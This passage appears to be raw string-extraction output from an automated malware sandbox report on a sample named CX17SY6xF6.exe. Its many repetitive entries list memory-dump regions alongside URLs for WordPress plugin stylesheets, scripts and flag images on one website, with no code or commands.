http://www.elpro.si/wp-content/plugins/perfect-woocommerce-brands/build/frontend/js/index.js?ver=2c7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/close.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/../images/logo.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js?ver
                  Source: CX17SY6xF6.exe, 00000000.00000003.766371210.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699010816.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepre
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css?ver=4.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.766371210.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699010816.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.pnAD
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/flags/sl.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js?
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-gdpr
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/css/cookie-law-info-publ
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-publi
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, 